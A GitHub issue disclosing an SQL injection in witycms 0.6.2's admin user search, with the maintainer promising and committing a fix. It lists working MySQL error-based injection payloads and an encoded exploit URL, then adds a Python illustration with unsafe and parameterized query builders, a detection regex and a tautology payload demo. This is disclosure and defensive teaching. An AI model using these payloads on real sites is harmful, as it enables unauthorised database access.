Find a SQL injection #157
Bro, you are churning out CVEs like crazy.
Hello, thx!
Ok, I see the issue. A fix is coming. Thx!
JohanDufau added a commit that referenced this issue on Nov 9, 2018.
Search for user discovery injection under the witycms 0.6.2 "Utilisateur" menu. No input parameters were filtered. /admin/user/users? Nickname=1&email=&firstname=&lastname=&groupe=
payload:
firstname=' AND (SELECT 6463 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(6463=6463,1))),0x717a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zcMP&lastname=&nickname=root&email=&groupe=
lastname=' AND (SELECT 2839 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2839=2839,1))),0x717a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- oNFP&nickname=root&email=&groupe=
Defective pages and addresses
http://127.0.0.1/witycms/admin/user/users?nickname=roott%27+AND+%28SELECT+9674+FROM%28SELECT+COUNT%28*%29%2CCONCAT%280x71717a6271%2C%28SELECT+%28ELT%289674%3D9674%2C1%29%29%29%2C0x7178627871%2CFLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29--+YoTG&email=&firstname=&lastname=&groupe=
Attack through sqlmap, find database name and database type.
A page executed by background code.
\apps\user\front\model.php
——中科卓信软件测评技术中心
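The following Python is an added example and is not witycms code (the page does not show the query in apps/user/front/model.php). It assumes a hypothetical user-list query that pastes the five search fields into LIKE clauses, which is consistent with the report that no parameter is filtered, and places a parameterized version next to it. It decodes the reported URL to show how the quote in `nickname` closes the literal and the `-- YoTG` tail comments out the rest, and it flags the request with a signature for the technique used: MySQL raises a "Duplicate entry ... for key" error when FLOOR(RAND(0)*2) is used as a GROUP BY key, and the CONCAT()ed value is echoed in that error text. SQLite does not reproduce that error, so the runnable part uses a simple tautology payload against a constructed in-memory table.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# The request URL from the issue report, verbatim.
REPORTED_URL = (
    "http://127.0.0.1/witycms/admin/user/users?nickname=roott%27+AND+%28SELECT+9674"
    "+FROM%28SELECT+COUNT%28*%29%2CCONCAT%280x71717a6271%2C%28SELECT+%28ELT%289674"
    "%3D9674%2C1%29%29%29%2C0x7178627871%2CFLOOR%28RAND%280%29*2%29%29x+FROM"
    "+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29--+YoTG&email=&firstname=&lastname="
    "&groupe="
)

# The five search-form fields named in the report.
FILTER_FIELDS = ("nickname", "email", "firstname", "lastname", "groupe")


def request_params(url):
    """Decode the search fields from a request URL ('+' becomes a space)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {f: qs.get(f, [""])[0] for f in FILTER_FIELDS}


def build_unsafe(params):
    """Hypothetical vulnerable builder (assumed pattern, not witycms code):
    each non-empty value is pasted into the SQL text, so a quote in the value
    ends the string literal and everything after it is parsed as SQL."""
    where = [f"{col} LIKE '%{val}%'" for col, val in params.items() if val]
    sql = "SELECT id, nickname, email FROM users"
    if where:
        sql += " WHERE " + " AND ".join(where)
    return sql


def build_safe(params):
    """Hardened builder: column names come only from the FILTER_FIELDS
    allow-list and values are bound as parameters, so they stay data.
    Returns (sql, args) for a driver's execute()."""
    where, args = [], []
    for col, val in params.items():
        if col not in FILTER_FIELDS:
            raise ValueError(f"unknown filter column {col!r}")
        if val:
            where.append(f"{col} LIKE ?")
            args.append(f"%{val}%")
    sql = "SELECT id, nickname, email FROM users"
    if where:
        sql += " WHERE " + " AND ".join(where)
    return sql, args


# Signature of the MySQL error-based technique in the report: FLOOR(RAND(0)*2)
# used as a GROUP BY key. Detected here, not executed (SQLite has no such error).
ERROR_BASED_RE = re.compile(
    r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*?GROUP\s+BY", re.I | re.S
)


def flags_error_based_sqli(url):
    """True when any search field carries the FLOOR(RAND(0)*2)...GROUP BY pattern."""
    return any(ERROR_BASED_RE.search(v) for v in request_params(url).values())


def demo_db():
    """Constructed in-memory stand-in for the users table (sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, nickname TEXT, email TEXT,"
        " firstname TEXT, lastname TEXT, groupe TEXT)"
    )
    db.executemany(
        "INSERT INTO users (nickname, email, firstname, lastname, groupe)"
        " VALUES (?, ?, ?, ?, ?)",
        [
            ("root", "root@example.test", "Ad", "Min", "admin"),
            ("alice", "alice@example.test", "Alice", "Doe", "user"),
            ("bob", "bob@example.test", "Bob", "Roe", "user"),
        ],
    )
    return db


def run_unsafe(db, params):
    return db.execute(build_unsafe(params)).fetchall()


def run_safe(db, params):
    sql, args = build_safe(params)
    return db.execute(sql, args).fetchall()


# Tautology payload SQLite can run: the quote closes the literal, OR 1=1
# matches every row, and "-- " comments out the dangling %'.
TAUTOLOGY = {"nickname": "zzz' OR 1=1 -- "}

if __name__ == "__main__":
    print(build_unsafe(request_params(REPORTED_URL)))
    print(build_safe(request_params(REPORTED_URL)))
    print("flagged:", flags_error_based_sqli(REPORTED_URL))
    db = demo_db()
    print("unsafe rows:", len(run_unsafe(db, TAUTOLOGY)))
    print("safe rows:", len(run_safe(db, TAUTOLOGY)))
```

With the unsafe builder the tautology returns every user; with the bound-parameter builder the same input is just an odd nickname and matches nothing. The signature check is a cheap log or WAF filter for this specific sqlmap technique, not a substitute for parameterizing the query.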